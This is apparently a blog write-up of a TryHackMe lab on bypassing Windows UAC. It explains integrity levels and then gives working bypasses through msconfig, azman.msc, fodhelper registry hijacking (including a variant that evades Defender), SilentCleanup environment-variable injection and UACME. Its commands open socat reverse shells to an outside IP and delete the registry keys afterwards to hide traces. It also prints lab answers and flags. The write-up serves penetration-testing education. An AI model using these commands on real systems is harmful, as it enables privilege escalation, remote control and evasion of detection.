Bypassing UAC

Bypassing Windows UAC using variation of methods

In this blog I will explain how windows UAC works and how we as an attacker can bypass it with various methods with a Tryhackme room.

User Account Control (UAC)

User Account Control (UAC) is a Windows security feature that forces any new process to run in the security context of a non-privileged account by default. This policy applies to processes started by any user, including administrators themselves. The idea is that we can't solely rely on the user's identity to determine if some actions should be authorized.

Suppose a user unknowingly downloads a malicious application from the Internet. If that user is a part of administrator group, any application it launches will inherit its access token privileges. So if the user decides to launch the malicious application and UAC is disabled, the malicious application will gain administrative privileges. If UAC is enabled the application will be restricted to a non-administrative access token.

UAC Elevation

If an administrator is required to perform a privileged task, UAC provides a way to elevate privileges. Elevation works by presenting a simple dialogue box to the user to confirm that they explicitly approve running the application in an administrative security context.

Click on 'Yes' will grant access and the application will run with administrative privileges.

Integrity Levels

UAC is a Mandatory Integrity Control (MIC), which is a mechanism that allows differentiating users, processes and resources by assigning an Integrity Level (IL) to each of them. In general terms, users or processes with a higher IL access token will be able to access resources with lower or equal ILs. MIC takes precedence over regular Windows DACLs, so you may be authorized to access a resource according to the DACL, but it won't matter if your IL isn't high enough.There are 4 integrity Levels used by the windows, ordered from lowest to highest

  1. Low - Generally used for interaction with the Internet (i.e. Internet Explorer). Has very limited permissions.

  2. Medium - Assigned to standard users and Administrators filtered tokens.

  3. High - Used by Administrators' elevated tokens if UAC is enabled. If UAC is disabled, all administrators will always use a high IL token.

  4. System - Reserved for system use.

When a process requires to access a resource, it will inherit the calling user's access token and its associated IL. The same occurs if a process forks a child.

Filtered Tokens

UAC treats regular users and administrators in a different way during logon

  • Non-administrators will receive a single access token when logged in, which will be used for all tasks performed by the user. This token has Medium IL.

  • Administrators will receive two access tokens:

  • Filtered Token: A token with Administrator privileges stripped, used for regular operations. This token has Medium IL.

  • Elevated Token: A token with full Administrator privileges, used when something needs to be run with administrative privileges. This token has High IL.

Administrators will use their filtered token unless they explicitly request administrative privileges via UAC.

Opening an Application

In this we will try to open a cmd windows, one with UAC and other without UAC.

Now if we analyze both processes on Process Hacker tool.

On the left, you have a filtered token with medium IL and almost no privileges assigned. On the right, you can see that the process runs with high IL and has many more privileges available. Another difference that may not be so obvious is that the medium IL process is effectively denied any privileges related to being part of the Administrators group.

UAC Settings

Depending on the security requirements, UAC can be configured to run at four different notification level.

  • Always notify: Notify and prompt the user for authorization when making changes to Windows settings or when a program tries to install applications or make changes to the computer.

  • Notify me only when programs try to make changes to my computer: Notify and prompt the user for authorization when a program tries to install applications or make changes to the computer. Administrators won't be prompted when changing Windows settings.

  • Notify me only when programs try to make changes to my computer (do not dim my desktop): Same as above, but won't run the UAC prompt on a secure desktop.

  • Never notify: Disable UAC prompt. Administrators will run everything using a high privilege token.

By default, UAC is configured on the Notify me only when programs try to make changes to my computer level.

UAC Internals

At the heart of UAC, we have the Application Information Service or Appinfo. Below is the diagram that explains working of UAC.

Whenever a user requires an elevation, there are following steps:

  1. The user requests to run an application as administrator.

  2. A ShellExecute API call is made using the runas verb.

  3. The request gets forwarded to Appinfo to handle elevation.

  4. The application manifest is checked to see if AutoElevation is allowed.

  5. Appinfo executes consent.exe, which shows the UAC prompt on a secure desktop. A secure desktop is simply a separate desktop that isolates processes from whatever is running in the actual user's desktop to avoid other processes from tampering with the UAC prompt in any way.

  6. If the user gives consent to run the application as administrator, the Appinfo service will execute the request using a user's Elevated Token. Appinfo will then set the parent process ID of the new process to point to the shell from which elevation was requested.

Bypassing UAC

From a threat actor perspective, there might be situations where you get a remote shell to a Windows host via Powershell or cmd.exe. You might even gain access through an account that is part of the Administrators group, but if we try to perform some system level functionality like adding a user.

The access to this functionality is denied. Even though the user is in the administrator group. To check the reason behind this, check the assigned group attributes.

Even when we get a Powershell session with an administrative user, UAC prevents us from performing any administrative tasks as we are currently using a filtered token only. If we want to take full control of our target, we must bypass UAC.

Interestingly enough, Microsoft doesn't consider UAC a security boundary but rather a simple convenience to the administrator to avoid unnecessarily running processes with administrative privileges. In that sense, the UAC prompt is more of a reminder to the user that they are running with high privileges rather than impeding a piece of malware or an attacker from doing so. Since it isn't a security boundary, any bypass technique is not considered a vulnerability to Microsoft, and therefore some of them remain unpatched to this day.

Generally speaking, most of the bypass techniques rely on us being able to leverage a High IL process to execute something on our behalf. Since any process created by a High IL parent process will inherit the same integrity level, this will be enough to get an elevated token without requiring us to go through the UAC prompt. In order to reduce the complexity, we assume that we already have administrative account access with Medium IL.

Answers the questions

1. What is the highest integrity level (IL) available on Windows?

  • system

2. What is the IL associated with an administrator's elevated token?

  • high

3. What is the full name of the service in charge of dealing with UAC elevation requests?

  • application information service

UAC - GUI Based Bypasses

First we will focus on bypassing UAC on GUI. This becomes easy if a threat actor has RDP access over a system. We will look at two case studies, msconfig and azman.msc

Case Study - msconfig

In this case goal is to access a High IL command prompt without passing through UAC. Starting from msconfig. Open the 'run' window are run msconfig.

If we analyze the msconfig process in Process Hacker(available on the desktop), you can notice that even though no UAC prompt was presented to us, msconfig run as High IL process.

This was possible because of the feature called auto elevation that allows specific binaries to elevate without requiring the user's interaction. If we could force msconfig to spawn a shell for us, the shell would inherit the same access token used by msconfig and therefore be run as a high IL process. By navigating to the Tools tab,

Select the Command Prompt option and click on Launch.

This resulted in a command prompt windows with High IL without interacting with UAC. Get the flag using the tool.

What flag is returned by running the msconfig exploit?

THM{UAC_HELLO_WORLD}

Case Study: azman.msc

As with msconfig, azman.msc will auto elevate without requiring user interaction. If we can find a way to spawn a shell from within that process, we will bypass UAC. Note that, unlike msconfig, azman.msc has no intended built-in way to spawn a shell. First, run azman.msc

To run a shell, we will abuse the application's help.

On the help screen, we will right-click any part of the help article and select View Source.

This will spawn a notepad process.

We can leverage this, Go to File -> Open and make sure you select 'All Files'.

Find cmd.exe. right click and click on Open.

This will bypass the UAC and open the cmd.exe as High IL. We can also check the Process Hacker to confirm.

Get the azman flag.

UAC - Auto-Elevating Processes

Some of the executables can auto-elevate that results in achieving High level IL. This applies to most of the Control Panel's functionality and some executable provided with Windows.For an application, some requirements need to be met to auto-elevate:

  • The executable must be signed by the Windows Publisher

  • The executable must be contained in a trusted directory, like %SystemRoot%/System32/ or %ProgramFiles%/

Executable files (.exe) must declare the autoElevate element inside their manifests. To check a file's manifest, we can use sigcheck, a tool provided as part of the Sysinternals suite. You can find a copy of sigcheck on your machine on C:\tools\. If we check the manifest for msconfig.exe, we will find the autoElevate property.

C:\tools\> sigcheck64.exe -m c:/windows/system32/msconfig.exe
...
<asmv3:application>
	<asmv3:windowsSettings xmlns="http://schemas.microsoft.com/SMI/2005/WindowsSettings">
		<dpiAware>true</dpiAware>
		<autoElevate>true</autoElevate>
	</asmv3:windowsSettings>
</asmv3:application>

mmc.exe will auto elevate depending on the .msc snap-in that the user requests. Most of the .msc files included with Windows will auto elevate.

Windows keeps an additional list of executables that auto elevate even when not requested in the manifest. This list includes pkgmgr.exe and spinstall.exe, for example. COM objects can also request auto-elevation by configuring some registry keys.

Case Study: Fodhelper

Fodhelper.exe is one of Windows default executables in charge of managing Windows optional features, including additional languages, applications not installed by default, or other operating system characteristics. fodhelper can auto elevate when using default UAC settings so that administrators won't be prompted for elevation when performing standard administrative tasks. To abuse, open fodhelper.exe

From an threat actors perspective, this means that it can be used through a medium integrity remote shell and leveraged into a fully functional high integrity process. Checking the fodhelper.exe inside Process Monitor tool.

We can notice that fodhelper searches the registry for a specific key in interest. When Windows opens a file, it checks the registry to know what application to use. The registry holds a key known as Programmatic ID (ProgID) for each filetype, where the corresponding application is associated. Let's say you try to open an HTML file. A part of the registry known as the HKEY_CLASSES_ROOT will be checked so that the system knows that it must use your preferred web client to open it. The command to use will be specified under the shell/open/command subkey for each file's ProgID. Taking the "htmlfile" ProgID as an example.

In reality, HKEY_CLASSES_ROOT is just a merged view of two different paths on the registry:

  1. HKEY_LOCAL_MACHINE\Software\Classes - System-wide file associations

  2. HKEY_CURRENT_USER\Software\Classes - Active user's file associations

When checking HKEY_CLASSES_ROOT, if there is a user-specific association at HKEY_CURRENT_USER (HKCU), it will take priority. If no user-specific association is configured, then the system-wide association at HKEY_LOCAL_MACHINE (HKLM) will be used instead. This way, each user can choose their preferred applications separately if desired.Going back to fodhelper, we now see that it's trying to open a file under the ms-settings ProgID. By creating an association for that ProgID in the current user's context under HKCU, we will override the default system-wide association and, therefore, control which command is used to open the file. Since fodhelper is an autoElevate executable, any subprocess it spawns will inherit a high integrity token, effectively bypassing UAC.Now moving towards exploitation, to save time a backdoor is planted inside the windows machine. You need to just connect to it using netcat. This will result in a webshell as user 'attacker' that is already in administrator group and has Medium IL. But UAC is preventing it from running High IL processes.

Connect to the machine using the command

nc MACHINE_IP 9999

We set the required registry values to associate the ms-settings class to a reverse shell. For your convenience, a copy of socat can be found on c:\tools\socat. You can use the following commands to set the required registry keys from a standard command line:

C:\> set REG_KEY=HKCU\Software\Classes\ms-settings\Shell\Open\command
C:\> set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:10.8.135.208:4444 EXEC:cmd.exe,pipes"

C:\> reg add %REG_KEY% /v "DelegateExecute" /d "" /f
The operation completed successfully.

C:\> reg add %REG_KEY% /d %CMD% /f
The operation completed successfully.

Now running the fodhelper.exe will elevate our IL.

Checking the Integrity Level.

Now get the Fodhelper.exe flag.

As a result of this exploit some artefact will be created on the target system if the form of registry key. As perspective of threat actor or a responsible pentester it is highly recommended to erase the tracks to avoid detection.

reg delete HKCU\Software\Classes\ms-settings\ /f

Bypassing Windows Defender using improved Fodhelper Exploit

For the simplicity, the machine we are targeting has Windows Defender disabled. Turn on the Windows Defender by double clicking on the desktop icon.

Now try exploiting fodhelper again through the backdoor connection and see what happens on the server's GUI. Just as you change the (default) value in HKCU\Software\Classes\ms-settings\Shell\Open\command to insert your reverse shell command, a Windows Defender notification will pop up.

Click on the notification.

We can check the details on the alert, which mention a UAC bypass attempt by modifying a registry value. Although by now it would seem our exploit wouldn't work with Windows Defender enabled, check what happens if you run the same commands but with a slight modification.

C:\> set REG_KEY=HKCU\Software\Classes\ms-settings\Shell\Open\command
C:\> set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:10.8.135.208:4444 EXEC:cmd.exe,pipes"

C:\> reg add %REG_KEY% /v "DelegateExecute" /d "" /f
The operation completed successfully.

C:\> reg add %REG_KEY% /d %CMD% /f & reg query %REG_KEY%
HKEY_CURRENT_USER\Software\Classes\ms-settings\Shell\Open\command
    DelegateExecute    REG_SZ    
    (Default)    REG_SZ    powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:10.8.135.208:4444 EXEC:cmd.exe,pipes

We have added a quick query to the offending registry value right after setting it to the command required for our reverse shell. Start a listener on port 4444 and run the fodhelper.exe.

We didn't received a reverse shell and checking the value of the registry key. The Windows Defender automatically deleted it.

Improving the fodhelper exploit

Instead of writing our payload into HKCU\Software\Classes\ms-settings\Shell\Open\command, we will use the CurVer entry under a progID registry key. This entry is used when you have multiple instances of an application with different versions running on the same system. CurVer allows you to point to the default version of the application to be used by Windows when opening a given file type.

To this end, we will create an entry on the registry for a new progID of our choice (any name will do) and then point the CurVer entry in the ms-settings progID to our newly created progID. This way, when fodhelper tries opening a file using the ms-settings progID, it will notice the CurVer entry pointing to our new progID and check it to see what command to use.

$program = "powershell -windowstyle hidden C:\tools\socat\socat.exe TCP:<attacker_ip>:4445 EXEC:cmd.exe,pipes"

New-Item "HKCU:\Software\Classes\.pwn\Shell\Open\command" -Force
Set-ItemProperty "HKCU:\Software\Classes\.pwn\Shell\Open\command" -Name "(default)" -Value $program -Force
    
New-Item -Path "HKCU:\Software\Classes\ms-settings\CurVer" -Force
Set-ItemProperty  "HKCU:\Software\Classes\ms-settings\CurVer" -Name "(default)" -value ".pwn" -Force
    
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden

Although there are 50-50 chances of this method working. But if we translate our payload from powershell to cmd. First start a listener on port 4445

C:\> set CMD="powershell -windowstyle hidden C:\Tools\socat\socat.exe TCP:10.8.135.208:4445 EXEC:cmd.exe,pipes"

C:\> reg add "HKCU\Software\Classes\.thm\Shell\Open\command" /d %CMD% /f
The operation completed successfully.

C:\> reg add "HKCU\Software\Classes\ms-settings\CurVer" /d ".thm" /f
The operation completed successfully.

C:\> fodhelper.exe

Check the listener.

Now get the flag.

After this clear the tracks as usual.

reg delete "HKCU\Software\Classes\.thm\" /f
reg delete "HKCU\Software\Classes\ms-settings\" /f

Environment Variable Expansion

If UAC is configured on the "Always Notify" level, fodhelper and similar apps won't be of any use as they will require the user to go through the UAC prompt to elevate. This would prevent several known bypass methods to be used.

Case study: Disk Cleanup Scheduled Task

Before we began make sure to turn off the windows defender for this task to be completed succesfully.

To understand why we are picking Disk Cleanup, let's open the Task Scheduler and check the task's configuration.

Here we can see that the task is configured to run with the Users account, which means it will inherit the privileges from the calling user. The Run with highest privileges option will use the highest privilege security token available to the calling user, which is a high IL token for an administrator.

Notice that if a regular non-admin user invokes this task, it will execute with medium IL only since that is the highest privilege token available to non-admins, and therefore the bypass wouldn't work.

Checking the Actions and Settings tabs, we have the following

The task can be run on-demand, executing the following command when invoked: %windir%\system32\cleanmgr.exe /autoclean /d %systemdrive% Since the command depends on environment variables, we might be able to inject commands through them and get them executed by starting the DiskCleanup task manually.

Luckily for us, we can override the %windir% variable through the registry by creating an entry in HKCU\Environment. If we want to execute a reverse shell using socat, we can set %windir% as follows (without the quotes):

cmd.exe /c C:\tools\socat\socat.exe TCP:<attacker_ip>:4445 EXEC:cmd.exe,pipes &REM

At the end of our command, we concatenate "&REM " (ending with a blank space) to comment whatever is put after %windir% when expanding the environment variable to get the final command used by DiskCleanup. The resulting command would be (be sure to replace your IP address where needed):

cmd.exe /c C:\tools\socat\socat.exe  TCP:<attacker_ip>:4445 EXEC:cmd.exe,pipes &REM  \system32\cleanmgr.exe /autoclean /d %systemdrive%

Where anything after the "REM" is ignored as a comment. Now moving towards exploitation. First start a listener on port 446

C:\> reg add "HKCU\Environment" /v "windir" /d "cmd.exe /c C:\tools\socat\socat.exe TCP:10.8.135.208:4446 EXEC:cmd.exe,pipes &REM " /f

C:\> schtasks /run  /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I

After some time, check the listener. Get the flag

After this task cover the tracks

reg delete "HKCU\Environment" /v "windir" /f

Automated Exploitation

An excellent tool is available to test for UAC bypasses without writing your exploits from scratch. Created by @hfiref0x, UACME provides an up to date repository of UAC bypass techniques that can be used out of the box. The tool is available for download at its official repository on

https://github.com/hfiref0x/UACME

While UACME provides several tools, we will focus mainly on the one called Akagi, which runs the actual UAC bypasses. You can find a compiled version of Akagi under C:\tools\UACME-Akagi64.exe. Using the tool is straightforward and only requires you to indicate the number corresponding to the method to be tested. A complete list of methods is available on the project's GitHub description. If you want to test for method 33, you can do the following from a command prompt, and a high integrity cmd.exe will pop up.

First trying the method 33 - fodhelper bypass

Trying the method 70 - fodhelper.exe using CurVer registry key.

Conclusion

In the blog, we've seen various methods from manual GUI to using command prompt then in the end automated exploitation for bypassing the Windows UAC system.

Hope you enjoyed reading 😇

PreviousPrivilege EscalationNextPersistence

Last updated